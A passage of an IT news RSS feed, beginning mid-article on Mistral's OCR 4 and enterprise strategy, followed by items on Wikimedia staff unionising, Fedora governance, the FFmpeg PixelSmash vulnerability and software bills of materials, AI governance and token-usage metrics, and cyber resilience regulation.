href="https://cloud.google.com/document-ai">Google Document AI</a>, <a href="https://aws.amazon.com/textract/">Amazon Textract</a>, <a href="https://azure.microsoft.com/en-us/products/ai-foundry/tools/document-intelligence">Azure Document Intelligence</a>, <a href="https://www.abbyy.com/vantage/">ABBYY Vantage</a>, and a growing number of open-weight models. </p><p>On the <a href="https://news.ycombinator.com/item?id=48643426">Hacker News thread</a> for Unlimited-OCR, practitioners offered a candid assessment of the state of the art. Joss82, who has worked on document parsing for 10 years, wrote bluntly: "OCR still sucks in 2026." Meanwhile, one user named SyneRyder reported success with Claude for OCR of hundreds of pages of handwritten documents, noting the model delivered results with "no corrections required" and even pointed out a continuity error in the source text. These practitioner reports underscore a key tension in the market: performance varies wildly depending on the specific document type, language, and quality of the source material.</p><h2><b>The real play is not OCR — it is an enterprise AI stack with document intelligence as the on-ramp</b></h2><p>Step back far enough, and <a href="https://mistral.ai/news/ocr-4/">Mistral's OCR 4 release</a> is not really an OCR story. It is an enterprise go-to-market story built on top of a $4.4 billion global intelligent document processing market that is forecast to grow at a 33.1% compound annual growth rate through 2030, according to <a href="https://www.grandviewresearch.com/industry-analysis/intelligent-document-processing-market-report">Grand View Research</a>.</p><p>For Mistral, OCR is a wedge into enterprise AI budgets. The model feeds directly into Mistral's <a href="https://mistral.ai/news/search-toolkit/">Search Toolkit</a>, the company's open-source composable search framework announced at the AI Now Summit. In that architecture, <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> serves as the ingestion layer for retrieval-augmented generation and enterprise search pipelines, converting raw documents into citation-ready, structurally classified input. The logic is clear: once an enterprise adopts OCR 4 for document extraction, Mistral's broader model suite — including Medium 3.5 for reasoning and the Vibe agentic platform for task execution — becomes the natural next step in the stack. </p><p>That pipeline ambition is critical context for understanding Mistral's current fundraising trajectory. Bloomberg recently reported that the company is in early discussions to <a href="https://www.bloomberg.com/news/articles/2026-06-12/france-s-mistral-in-funding-talks-at-about-20-billion-valuation">raise about €3 billion ($3.5 billion)</a> at a valuation of roughly €20 billion — nearly double the €11.7 billion valuation from its September Series C round. To date, Mistral has raised only about $4 billion, a fraction of what its largest U.S. rivals have taken in. OCR 4 and its associated enterprise revenue pipeline are part of how the company plans to justify that higher valuation, with Mistral targeting <a href="https://www.lemonde.fr/en/economy/article/2026/01/22/french-ai-firm-mistral-predicts-revenue-of-1-billion-in-2026_6749706_19.htm">€1 billion in revenue</a> for 2026, up from €200 million in 2025, according to Le Monde.</p><p>Mistral is a company with roughly 1,000 employees and ambitions to compete with labs that have raised 40 times as much capital. It cannot win a general-purpose model arms race against OpenAI and Anthropic. What it can do is build a differentiated enterprise stack around sovereignty, <a href="https://mistral.ai/news/ocr-4/">structured document intelligence</a>, and agentic workflows — and use that stack to capture European enterprise budgets that are increasingly wary of U.S. provider dependency. </p><p>The pricing structure reinforces that strategy: at $2 per 1,000 pages in batch mode, the cost of processing a 100,000-page corporate archive falls to $200, making large-scale digitization projects economically viable in ways they may not have been with token-based vision-language model pricing.</p><p>Whether Mistral can execute that vision at scale — against Google, Amazon, Microsoft, and a surging open-source ecosystem — remains an open question. But the Anthropic export control crisis is still unresolved, European data sovereignty regulations are tightening, and a potential €20 billion funding round is on the horizon. The company is holding an <a href="https://learn.mistral.ai/public/events/ocr4-webinar">OCR 4 production webinar on July 7 at 6:00 PM CET</a>.</p><p>Two weeks ago, the argument for building AI infrastructure outside the reach of U.S. export controls was theoretical. Then the U.S. government flipped a switch, and Anthropic's most advanced models went dark for every non-American on the planet. Mistral did not cause that crisis — but it spent the last year building the product that makes it matter.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK staff at the foundation that runs Wikipedia seeks union recognition]]></title>
<description><![CDATA[UK-based staff at the Wikimedia Foundation (WMF), the nonprofit that supports Wikipedia, are pushing forward with their unionization drive. On Wednesday, the staff sent a letter to WMF management requesting the organization voluntarily recognize the union. "The WMF has undergone a period of signi...]]></description>
<link>https://tsecurity.de/de/3622226/it-nachrichten/uk-staff-at-the-foundation-that-runs-wikipedia-seeks-union-recognition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622226/it-nachrichten/uk-staff-at-the-foundation-that-runs-wikipedia-seeks-union-recognition/</guid>
<pubDate>Wed, 24 Jun 2026 19:03:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[UK-based staff at the Wikimedia Foundation (WMF), the nonprofit that supports Wikipedia, are pushing forward with their unionization drive. On Wednesday, the staff sent a letter to WMF management requesting the organization voluntarily recognize the union. "The WMF has undergone a period of significant change in recent months, escalating workers' concerns over transparency, trust, and […]]]></content:encoded>
</item>
<item>
<title><![CDATA[I made a massive mistake when buying Red Dead Redemption 2 — Here's how to avoid the same trap with GTA 6]]></title>
<description><![CDATA[Don't make my mistake when buying Grand Theft Auto 6.]]></description>
<link>https://tsecurity.de/de/3621288/it-nachrichten/i-made-a-massive-mistake-when-buying-red-dead-redemption-2-heres-how-to-avoid-the-same-trap-with-gta-6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621288/it-nachrichten/i-made-a-massive-mistake-when-buying-red-dead-redemption-2-heres-how-to-avoid-the-same-trap-with-gta-6/</guid>
<pubDate>Wed, 24 Jun 2026 14:18:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Don't make my mistake when buying Grand Theft Auto 6.]]></content:encoded>
</item>
<item>
<title><![CDATA[Fedora Governance Changes Take Effect as Project Refines Leadership, Policy, and Contributor Oversight]]></title>
<description><![CDATA[by George Whittaker
      
            A series of Fedora governance updates are now taking effect, marking another step in the project's ongoing effort to modernize decision-making processes, improve transparency, and better support Fedora's growing contributor community. The changes come as the...]]></description>
<link>https://tsecurity.de/de/3620008/unix-server/fedora-governance-changes-take-effect-as-project-refines-leadership-policy-and-contributor-oversight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620008/unix-server/fedora-governance-changes-take-effect-as-project-refines-leadership-policy-and-contributor-oversight/</guid>
<pubDate>Wed, 24 Jun 2026 03:45:57 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-history-node-id="1341438" class="layout layout--onecol">
    <div class="layout__region layout__region--content">
      
            <div class="field field--name-field-node-image field--type-image field--label-hidden field--item">  <img loading="lazy" src="https://www.linuxjournal.com/sites/default/files/nodeimage/story/fedora-governance-changes-take-effect-as-project-refines-leadership-policy-and-contributor-oversight.jpg" width="850" height="500" alt="Fedora Governance Changes Take Effect as Project Refines Leadership, Policy, and Contributor Oversight" typeof="foaf:Image" class="img-responsive"></div>
      
            <div class="field field--name-node-author field--type-ds field--label-hidden field--item">by <a title="View user profile." href="https://www.linuxjournal.com/users/george-whittaker" lang="" about="https://www.linuxjournal.com/users/george-whittaker" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">George Whittaker</a></div>
      
            <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p>A series of Fedora governance updates are now taking effect, marking another step in the project's ongoing effort to modernize decision-making processes, improve transparency, and better support Fedora's growing contributor community. The changes come as the Fedora Council and other leadership bodies continue refining how one of the Linux world's largest community-driven projects is managed.</p>

<p>While these updates may not be as visible as a new desktop environment or kernel release, they play a critical role in shaping Fedora's future direction, community initiatives, and long-term sustainability.</p>

<h2><strong>How Fedora Governance Works</strong></h2>

<p>Fedora's governance structure is built around several key organizations that guide different aspects of the project.</p>

<p>These include:</p>

<ul><li>The <strong>Fedora Council</strong>, which oversees strategic direction</li>
	<li><strong>FESCo (Fedora Engineering Steering Committee)</strong>, responsible for technical and engineering decisions</li>
	<li><strong>Mindshare</strong>, which focuses on community outreach and contributor engagement</li>
	<li>Various Special Interest Groups (SIGs) and working groups that manage specific initiatives and technologies</li>
</ul><p>Together, these groups help coordinate thousands of contributors spread across the globe.</p>

<h2><strong>Greater Focus on Strategic Planning</strong></h2>

<p>Recent Fedora Council discussions have emphasized long-term planning and governance modernization. One major area of focus has been defining clearer processes for evaluating and managing new initiatives through what Fedora leaders call an <strong>Innovation Lifecycle</strong> framework.</p>

<p>The proposed framework aims to:</p>

<ul><li>Better evaluate experimental projects</li>
	<li>Establish clearer entry and review phases</li>
	<li>Define expectations for community initiatives</li>
	<li>Improve oversight as projects mature</li>
</ul><p>The goal is to create a more predictable path for new ideas while maintaining Fedora's culture of innovation.</p>

<h2><strong>Refining Contributor Representation</strong></h2>

<p>Another governance topic receiving significant attention involves contributor participation and voting eligibility.</p>

<p>Fedora leadership has been examining questions such as:</p>

<ul><li>What defines an active contributor?</li>
	<li>How should voting rights be determined?</li>
	<li>How can elections remain fair while staying inclusive?</li>
	<li>How should dormant accounts be handled?</li>
</ul><p>These discussions stem from concerns that existing systems may not always accurately reflect current contributor activity.</p>

<p>While no single solution has been finalized, governance bodies are actively working toward policies that balance openness with accountability.</p></div>
      
            <div class="field field--name-node-link field--type-ds field--label-hidden field--item">  <a href="https://www.linuxjournal.com/content/fedora-governance-changes-take-effect-project-refines-leadership-policy-and-contributor" hreflang="en">Go to Full Article</a>
</div>
      
    </div>
  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hole in widely-used FFmpeg codec could crash media servers or enable RCE]]></title>
<description><![CDATA[A newly discovered critical vulnerability in the FFmpeg media processing framework bundled in a huge number of open source and commercial applications points, again, to the need for CSOs to have strategies to deal with software supply chain vulnerabilities, which should include demanding a softwa...]]></description>
<link>https://tsecurity.de/de/3619921/it-security-nachrichten/hole-in-widely-used-ffmpeg-codec-could-crash-media-servers-or-enable-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619921/it-security-nachrichten/hole-in-widely-used-ffmpeg-codec-could-crash-media-servers-or-enable-rce/</guid>
<pubDate>Wed, 24 Jun 2026 02:35:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A newly discovered critical vulnerability in the <a href="https://ffmpeg.org/" target="_blank" rel="noreferrer noopener">FFmpeg media processing framework</a> bundled in a huge number of open source and commercial applications points, again, to the need for CSOs to have strategies to deal with software supply chain vulnerabilities, which should include demanding a software bill of materials for all products.</p>



<p><a href="https://jfrog.com/blog/pixelsmash-critical-ffmpeg-vulnerability-turns-media-files-into-weapons/" target="_blank" rel="noreferrer noopener">Found by researchers at JFrog</a>, the hole (<a href="https://nvd.nist.gov/vuln/detail/CVE-2026-8461" target="_blank" rel="noreferrer noopener">CVE-2026-8461</a>) is a heap out-of-bounds write in the MagicYUV decoder that can crash any application that uses the framework. It runs in everything from desktop video players like Kodi and mpv, to Linux file-manager thumbnail generators, to cloud transcoding pipelines (such as AWS MediaConvert and Cloudflare Stream) and self-hosted media servers.</p>



<p>The hole has been dubbed PixelSmash.</p>



<p>“The vulnerability can be used to crash systems and, in worst cases, can be escalated to remote code execution, meaning it should be taken seriously and prioritized by security teams and developers,”  <a href="https://jfrog.com/blog-author/yuval-moravchick/" target="_blank" rel="noreferrer noopener">Yuval Moravchik</a>, JFrog’s vulnerability research team lead, said in an email. “CSOs and developers should make sure their application security products alert them to the presence of this vulnerability, the sooner the better.”</p>



<p>The researchers said they have demonstrated the full exploit, achieving remote code execution on two independent targets: a Jellyfin media server (via automatic library scan) and a <a href="https://www.computerworld.com/article/4064116/a-european-alternative-to-m365-nextcloud-looks-to-capitalize-on-digital-sovereignty-interest.html" target="_blank">Nextcloud</a> collaboration platform instance (via the video preview provider), in both cases by simply uploading a crafted 50 KB AVI file.</p>



<p>In fact, any crafted media file (AVI, MKV, or MOV container) will work on an application that uses FFmpeg’s libavcodec. Even a file folder containing the app is vulnerable, because the file manager’s thumbnail generator will trigger the bug.</p>



<p>“All it takes is processing a single malicious media file,” the researchers say.</p>



<p>There is one workaround: If the MagicYUV decoder is not needed, it can be disabled by developers at build time.</p>



<p>However, <a href="https://www.linkedin.com/in/garrett-calpouzos-a21b2033" target="_blank" rel="noreferrer noopener">Garrett Calpouzos</a>, principal security researcher at Sonatype, doubts full exploitation will be common. “I would be surprised to see broad, reliable exploitation of this specific bug in modern, hardened environments,” he told <em>CSO </em>in an email. “The more realistic near-term risk is denial-of-service (DoS), especially for services that process untrusted media at scale.”</p>



<p>Regardless, users of FFmpeg should upgrade to the patched version (8.1.2) as soon as possible if they know it’s in their application or are so informed by vendors.</p>



<h2 class="wp-block-heading">A foundational dependency</h2>



<p>JFrog notes FFmpeg is bundled with or linked to by virtually every media-processing application on every platform. It confirmed crashes against Kodi, mpv, ffmpegthumbnailer (used by GNOME, KDE, XFCE), Jellyfin, Emby, Nextcloud, Immich, PhotoPrism, and OBS Studio, among others. </p>



<p>The vulnerability is a single bug in the codec decoder inside FFmpeg, but it’s a foundational dependency embedded in hundreds of downstream projects that cascades to every application that links libavcodec, an open source library that provides the core encoding and decoding capabilities for audio and video streams.</p>



<p>None of the affected projects introduced this bug, the researchers note. They inherited it silently through their dependency on FFmpeg. And most, they add, have no mechanism to detect or mitigate it independently.</p>



<p>This isn’t the first security issue in FFmpeg. As <a href="https://depthfirst.com/research/21-zero-days-in-ffmpeg" target="_blank" rel="noreferrer noopener">researchers at DepthFirst pointed out earlier this month</a>, Google’s Big Sleep team disclosed 13 vulnerabilities, and Anthropic, using its Claude Mythos preview model, <a href="https://www.anthropic.com/research/mythos-preview" target="_blank" rel="noreferrer noopener">found a 16-year-old hole</a>. In April, researchers at SentinelOne described <a href="https://www.sentinelone.com/vulnerability-database/cve-2025-63757/" target="_blank" rel="noreferrer noopener">a buffer overflow vulnerability</a>, and last December researchers at ZeroPath reported finding <a href="https://zeropath.com/blog/autonomously-finding-7-ffmpeg-vulnerabilities-with-ai-2025" target="_blank" rel="noreferrer noopener">seven memory vulnerabilities</a>.</p>



<h2 class="wp-block-heading">Combatting supply chain vulnerabilities</h2>



<p>Software supply chain vulnerabilities due to weaknesses in third party libraries and open source components have long been known as a security risk. Arguably the most infamous is the 2020 compromise of the update mechanism for <a href="https://www.csoonline.com/article/570537/the-solarwinds-hack-timeline-who-knew-what-and-when.html" target="_blank">SolarWinds Orion IT infrastructure management platform</a> in which a Russian threat group called APT20/Cozy Bear installed a backdoor into a legitimate update that went to 18,000 customers, although a much smaller group was exploited.</p>



<p>To combat supply chain vulnerabilities, experts say developers need to adopt strategies to scrutinize code before it is deployed. These include software composition analysis, which gives visibility into the software’s dependencies, static application security testing, container scans, and having or generating a software bill of materials (SBOM).</p>



<p><strong>[Related content: <a href="https://www.csoonline.com/article/573185/what-is-an-sbom-software-bill-of-materials-explained.html" target="_blank">What is an SBOM?</a>]</strong></p>



<h2 class="wp-block-heading">SBOMs critical</h2>



<p>SBOMs are easy to create if a developer is building their own app. They’re harder to get from downloaded or commercial applications.</p>



<p><a href="https://www.sans.org/profiles/dr-johannes-ullrich" target="_blank" rel="noreferrer noopener">Johannes Ullrich</a>, dean of research at the SANS Institute, told <em>CSO</em> that a transparent declaration of dependencies via SBOMs is critical if organizations are to accurately understand the risks posed by software. In particular, commercial software vendors are often hesitant to declare components; the perceived value that commercial software attempts to project is often incompatible with the wrappers it implements around commonly used open-source components.</p>



<p>One of the problems with the PixelSmash vulnerability, he pointed out, is the use of FFmpeg in an application is often neither obvious nor declared. An SBOM would help CSOs or heads of development teams quickly learn if any of their applications are affected.</p>



<p>What will it take to encourage CSOs to make SBOMs part of their security strategies? “Compliance regulation,” Ullrich replied. “These changes are usually only made if compliance requires them. Some influence may be exerted by government customers requiring SBOMs, but again, that will only happen if compliance requires this as part of purchasing guidelines.”</p>



<h2 class="wp-block-heading">Lesson: Attack surface management</h2>



<p>Sonatype’s Calpouzos said one big lesson for enterprises from the PixelSmash discovery is attack surface management. MagicYUV is a niche lossless video format used more in high-end video editing workflows than in mainstream web video delivery, he pointed out, and FFmpeg is typically built with every decoder enabled, meaning most applications end up exposing code paths they may never actually need. Infosec teams need to ensure they only enable the formats and features that their organization actually use in applications.</p>



<p>“This is also exactly where SBOMs matter,” he added. “Most organizations do not have a complete understanding of where FFmpeg is embedded, whether it is bundled or statically linked, or which optional features are enabled. An SBOM helps security teams move from ‘Are we exposed?’ to ‘Where are we exposed, and how fast can we fix it?’ In the AI era, attackers and researchers alike can increasingly comb through mature open source projects for overlooked vulnerabilities in obscure features, so organizations need to know what they ship, minimize what they expose, keep default security controls enabled, and patch quickly.”</p>



<h2 class="wp-block-heading">Recommendations for SBOMs </h2>



<p>The US Cybersecurity and Infrastructure Security Agency (CISA) has circulated <a href="https://www.cisa.gov/sites/default/files/2025-08/2025_CISA_SBOM_Minimum_Elements.pdf" target="_blank" rel="noreferrer noopener">a suggested list of minimum elements a software bill of materials should include</a>.</p>



<p>“An effective mechanism for sharing and using software data must be machine-processable and scalable,” the it notes. “The SBOM model achieves both by capturing software component data in a machine-processable format and supporting operations that analyze, share, and manage it. SBOM data can be mapped to other data sources such as security advisories or organization-level ‘approved/not approved’ software databases to improve other priority practices (e.g., secure software development, vulnerability management). SBOM will not resolve all software security and supply chain concerns, but it is a necessary step that enables and empowers risk-informed security decision making.”</p>



<p>Separately, last month the G7 cybersecurity working group, which includes the US, Germany, Canada, France, Italy, Japan, the United Kingdom, and the European Union, released joint guidance, <a href="https://bsi.bund.de/SharedDocs/Downloads/EN/BSI/KI/SBOM-for-AI_minimum-elements.html" target="_blank" rel="noreferrer noopener"><em>Software Bill of Materials for AI – Minimum Elements</em></a>, to help public and private sector stakeholders improve transparency in their artificial intelligence (AI) systems and supply chains.</p>



<p>However, JFrog’s Moravchik argues that while a software bill of materials is an essential first step, it’s only a starting point to more secure applications. “The teams that stay ahead pair it with continuous CVE mapping and exploitability analysis, scan at the binary level where these dependencies actually live, and disable codecs and features they don’t use,” he told <em>CSO</em>.</p>



<p>Infosec leaders also need to shift from reacting to proactively gating, he said. That means moving security enforcement upstream so risk is blocked at the door, through automated governance of every package, model, and agentic tool entering the pipeline paired with AI-powered threat detection, rather than remediating in the wild after a CVE drops.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The hidden cost of becoming AI-ready?]]></title>
<description><![CDATA[Governance debt



Modernization of legacy systems is not a new phenomenon. I have personally been involved in legacy system migration to a more efficient & modern software. Driven by the goal of achieving efficiencies, it may take months for the initial results to show up while the migration con...]]></description>
<link>https://tsecurity.de/de/3618017/it-nachrichten/the-hidden-cost-of-becoming-ai-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618017/it-nachrichten/the-hidden-cost-of-becoming-ai-ready/</guid>
<pubDate>Tue, 23 Jun 2026 13:03:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">Governance debt</h2>



<p>Modernization of legacy systems is not a new phenomenon. I have personally been involved in legacy system migration to a more efficient &amp; modern software. Driven by the goal of achieving efficiencies, it may take months for the initial results to show up while the migration continues in other phases. The emergence of AI has triggered an enterprise-wide race to drive efficiency across nearly every business process.</p>



<p>Today’s CIOs are under pressure to see measurable returns from AI investments and as a result, chatbots, agents and GenAI tools are being deployed at an unprecedented pace. The primary metric used to evaluate success is productivity, with AI delivering massive gains through faster coding, documentation, content generation and prototyping. However, these benefits often obscure a less visible reality: AI-generated outputs need code verification, compliance reviews and ongoing oversight.</p>



<p>I have not personally seen an organization where the “AI First” mandate is accompanied by a “governance-first” strategy. Yet, as executives push for faster delivery and measurable gains, risk assessments are often viewed as obstacles rather than necessities. This creates an interesting organizational paradox: the very technology adopted to accelerate work simultaneously introduces new requirements for oversight, accountability and trust. The phenomenon becomes even more significant as it gets embedded into every facet of organization, from software development to business reporting as well as customer support.</p>



<p>Having a manual human in the loop review for every agent output will not scale in the long run. But if not governed, the results are much more devastating with undocumented AI behavior and auditability gaps. Another factor necessitating governance is the AI inconsistency. Most leaders assume that AI behaves like traditional software with an input and an output. But with most AI models, the behavior differs even with the same prompt, model and data as different agents interpret context differently. Inconsistent AI outputs make enterprise quality standards harder to scale.</p>



<p>According to a study “<a href="https://assets.kpmg.com/content/dam/kpmgsites/xx/pdf/2026/04/global-ai-pulse.pdf.coredownload.inline.pdf" rel="nofollow">Global AI Pulse” by KPMG in 2026’</a>, 54% organizations remain in the early stages of the AI journey, while 75% executives expressed concern about AI-related risk and security, which begs a vital question – How do leaders enforce AI adoption while keeping the safeguards in place?</p>



<h2 class="wp-block-heading">How should AI be reviewed?</h2>



<p>As organizations embrace AI, the question of governance involves thinking at the grassroots level. In my fifteen years of overseeing complex architectures, having a human in the loop for daily pipelines generating output defeats the premise of AI adoption. Why is this operationally challenging? Most AI agents are generating thousands of answers to prompts and writing multiple lines of code. Additionally, AI agents are working at several stages of cleansing data, algorithm design and model configuration. The volume of generated AI artifacts will quickly exceed human review capabilities. One of the ways of countering this dilemma is to have additional oversight where human judgment delivers the most value in the initial phases of adoption. The AI leaders should be asking teams to validate for high-risk decisions, regulatory requirements, customer facing interactions. The objective can be to define a set of AI red flags for every team to be used as a governance framework, helping to identify the most common risks and maintain standards across the organization. This also leads to an important question of AI usage metric: What should leaders be using as a metric for measuring AI success while governance safeguards are being put in place?</p>



<h2 class="wp-block-heading">The token trap</h2>



<p>Enterprises have traditionally had to evolve their metrics of measuring digital transformation. Since productivity is the byproduct of AI, there is a temptation to use AI activity as a proxy for the value it generates. In many organizations, AI usage is getting measured by prompts, queries submitted, tokens used and interaction with chatbots. “Token maximization” — where employees are asked to track AI token usage, thereby correlating productivity with using more tokens — is driving up the organization’s costs without considering AI validation costs. In one of the articles on Fortune, this stark reality is exposed. According to the article, even the least expensive version of Clause Opus 4.6, which costs $5 for every million tokens and token usage going into billions, one user alone can cost the firm more than $1.4 million in costs. This creates a dangerous incentive structure with employees working towards higher token usage than maximizing the business outcomes.</p>



<p>In complex engineering environments, high activity does not correlate with high productivity. Employees trying to research a proprietary tool can use millions of tokens to get basic information, while seasoned employees trying to add value to the work may end up using a fraction of them. So how can leaders address this? The answer once lies in governance. During the cloud transformation era, organizations established teams responsible for Cloud deployment, migration standards and cost optimization. AI adoption requires a similar operating model for measuring AI activity as well as outcomes.</p>



<h2 class="wp-block-heading">Measuring adoption to outcome</h2>



<p>For a CIO, measuring AI impact is as critical as the adoption of AI. To get measurable values out of AI tools, the urge to deploy and measure usage activity should be replaced with a tactical, long-term approach to measure gains. AI adoption should be evaluated based on its impact on workflows. Leaders should focus on measurable improvements in the day-to-day tasks themselves. Organizations can track the reduction in deployment time for processes with or without the use of AI, along with the costs incurred on tokens or queries. Another metric to measure is improvements in accuracy by comparing established baselines with AI-generated output. An AI agent that generates faster output but requires more corrections might end up being less productive than a human. Cost efficiencies that compare AI cycle time with token usage are another good indicator of AI adoption measurement.</p>



<p>AI and its impact on organizational learning is another critical metric where the objective should be for employees to build expertise faster, transfer knowledge with better decisions over time. AI adoption that leads to less learning and more dependency (due to reliance on AI) may lead to organizational risk rather than adding value. Finally, as AI adoption matures, organizations should establish prompt governance frameworks. Aggregated team-level reporting that highlights prompt usage will reveal key training opportunities among employees. The idea is to help teams develop stronger AI practices while optimizing token usage and business impact.</p>



<h2 class="wp-block-heading">From adoption to value</h2>



<p>One of the most overlooked aspects of organizations adopting AI is its long-term operating cost. The underlying economics of AI carry the same level of discipline that organizations apply to all the other assets. While AI observability has emerged as an important metric to gauge AI adoption, CIOs must think beyond usage metrics and focus on the long-term return of AI investments. An organization’s AI maturity assessment should be calculated on the basis of spend vs created value, accuracy, skill development and cost effectiveness. Creating a framework to measure the value that AI creates will define the success of AI adoption for the organization and enable it to innovate and scale. Ultimately, the enterprises that succeed with AI will not be the ones to show it the fastest. AI success will not be a function of deployment speed; it will be a function of architectural discipline</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersecurity is no longer about protection. It’s about survival.]]></title>
<description><![CDATA[For years, cybersecurity professionals have been repeating the same warning: Every company will eventually be breached.



Fine. Let’s accept that.



Then why do so many organizations still behave as if the near sole purpose of cybersecurity is to prevent the breach from ever happening?



That ...]]></description>
<link>https://tsecurity.de/de/3617413/it-security-nachrichten/cybersecurity-is-no-longer-about-protection-its-about-survival/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617413/it-security-nachrichten/cybersecurity-is-no-longer-about-protection-its-about-survival/</guid>
<pubDate>Tue, 23 Jun 2026 09:08:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For years, cybersecurity professionals have been repeating the same warning: Every company will eventually be breached.</p>



<p>Fine. Let’s accept that.</p>



<p>Then why do so many organizations still behave as if the near sole purpose of cybersecurity is to prevent the breach from ever happening?</p>



<p>That is the contradiction at the heart of modern cybersecurity strategy. We say, “Assume the breach,” but we budget, govern, architect, and rehearse as if the wall will hold. We tell boards compromise is inevitable, then ask for more money to make the wall higher, thicker, smarter, and more AI-enabled. We buy more tools. We tune more dashboards. We polish the gate. We call it maturity. And then, when the wall of our gloriously protected city cracks, it turns out that half the city has no food, no command structure, no working roads, no backup water supply, and no idea who is supposed to organize the response.</p>



<p>That is not security. Or at least, it should no longer be understood as security.</p>



<h2 class="wp-block-heading">Pure prevention is the past</h2>



<p>The age of having a pure prevention focus has ended. Not because prevention is dead. That would be a childish argument. WAFs matter. MFA matters. Patching matters. Hardening matters. The familiar machinery still matters: hardened systems, sane configurations, patching discipline, identity controls, endpoint visibility, email defenses, logging, segmentation, and the rest of the security plumbing. Nobody serious is suggesting we kick open the gates and invite the attackers in.</p>



<p>But prevention alone is no longer a credible operating model. It no longer works as the primary focal point. The strategic question is no longer simply, “Can we stop the attack?” The better question is, “Can the organization continue to function when the attack succeeds?” That is the shift. Cybersecurity is not primarily about protection anymore. It is about survival.</p>



<p>Survival means breach readiness. It means continuity. It means recoverability. It means identity restoration when the identity provider is compromised. It means knowing which systems can be rebuilt cleanly and which ones are held together by duct tape, vendor promises, and one engineer we are all praying will never retire. It means backup integrity, crisis governance, legal and communications alignment, supplier fallback, product resilience, clean deployment pipelines, tested incident response, and executives who understand that cyber risk is not a quarterly awareness slide. Survival means designing organizations that can absorb breach, disruption, AI acceleration, supplier failure, regulatory pressure, and systemic shock without collapsing entirely.</p>



<p>This is not just philosophy. The world is moving there whether companies enjoy the view or not.</p>



<h2 class="wp-block-heading">The critical question</h2>



<p>In Europe, under the EU legislative umbrella, cyber resilience is becoming explicit regulatory language. <a href="https://www.csoonline.com/article/570091/eus-dora-regulation-explained-new-risk-management-requirements-for-financial-firms.html">DORA</a> makes digital operational resilience a serious financial-sector obligation. <a href="https://www.csoonline.com/article/3568787/eus-nis2-directive-for-cybersecurity-resilience-enters-full-enforcement.html">NIS2</a> widens the net around essential and important entities. The <a href="https://www.csoonline.com/article/4168696/eus-cyber-resiliency-act-will-put-it-leaders-to-the-test.html">Cyber Resilience Act</a> pushes security into the lifecycle of products with digital elements, from planning and design to development and maintenance. Europe, in its very European way, is saying: You shall be resilient, and <a href="https://www.csoonline.com/article/4108294/implementing-nis2-without-ending-up-in-a-paper-war.html">there shall be paperwork</a>.</p>



<p>The US is taking a different, perhaps more laissez-faire path. It is pushing accountability through disclosure, enforcement, sector rules, procurement pressure, and public-private nudging. The SEC wants material cyber risk and incidents visible to investors. CIRCIA aims to force critical infrastructure operators to report substantial incidents and ransom payments. CISA pushes <a href="https://www.csoonline.com/article/3971375/secure-by-design-is-likely-dead-at-cisa-will-the-private-sector-make-good-on-its-pledge.html">Secure by Design pledges</a>. All that sounds good. But there is a catch, and it lies in the unresolved question of criticality.</p>



<p>Critical for whom?</p>



<p>Critical for the government? For consumers? For markets? For the company’s customers? Critical for a supply chain that no regulator has fully mapped because the economy now runs on a cesspool of unmanaged SaaS dependencies?</p>



<p>Europe is increasingly trying to define resilience as an obligation. The US, more characteristically, is trying to produce accountability through disclosure, enforcement, procurement pressure, and market signaling. The problem is that market signaling collapses when nobody wants to admit they are part of the market’s critical nervous system. This is where the comfortable policy language starts to wobble.</p>



<p>“Critical infrastructure” is treated as if it were a natural category. It is not natural. It is political, legal, economic, operational, and worst of all, highly fluid. Companies are trying to avoid being seen as critical when the label brings obligations, reporting duties, scrutiny, liability, and expense. That is not cynicism. That is incentives doing what incentives do: rewarding ambiguity, punishing transparency, and giving everyone a reason to stay conveniently uncritical until the blast radius proves otherwise.</p>



<p>The deeper issue is not only critical infrastructure. It is critical dependency.</p>



<p>A company may not be critical to the state, but it may be critical to every customer that relies on it. A vendor may avoid the regulatory label, but not the blast radius. A minor-looking SaaS provider, identity layer, CI/CD platform, payment processor, LLM tool, MSP, open-source package, or API gateway can become the point where hundreds of organizations discover that their <a href="https://www.csoonline.com/article/515730/business-continuity-and-disaster-recovery-planning-the-basics.html">business continuity plan</a> was a PDF bundled in mindless optimism.</p>



